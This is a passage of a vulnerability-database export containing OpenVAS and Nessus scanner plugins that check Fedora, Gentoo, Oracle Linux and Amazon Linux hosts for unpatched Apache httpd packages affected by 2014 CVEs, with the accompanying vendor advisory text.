isrpmvuln(pkg:\"httpd24-devel\", rpm:\"httpd24-devel~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-manual\", rpm:\"httpd24-manual~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310868036", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868036", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2014-8742", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2014-8742\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868036\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:27:42 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0231\", \"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for httpd FEDORA-2014-8742\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8742\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135744.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "Gentoo Linux Local Security Checks GLSA 201504-03", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121370", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121370", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201504-03", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201504-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121370\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:46 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201504-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201504-03\");\n script_cve_id(\"CVE-2013-5704\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201504-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.29\"), vulnerable: make_list(\"lt 2.2.29\"))) 
!= NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-25T08:56:08", "description": "From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. 
(CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 21, "published": "2014-07-24T00:00:00", "title": "Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools"], "id": "ORACLELINUX_ELSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76744", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# Oracle Linux Security Advisory ELSA-2014-0920 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76744);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as 
having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. 
After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004243.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004246.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-87.0.1.el5_10\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-31.0.1.el6_5\")) 
flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-31.0.1.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:53", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. 
(CVE-2014-0231)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2014-388)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-388.NASL", "href": "https://www.tenable.com/plugins/nessus/78331", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-388.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78331);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-388\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2014-388)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. 
(CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux 
Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.27-1.3.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:53", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. 
A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd24 (ALAS-2014-389)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-389.NASL", "href": "https://www.tenable.com/plugins/nessus/78332", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-389.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78332);\n script_version(\"1.6\");\n 
script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-389\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2014-389)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. 
(CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 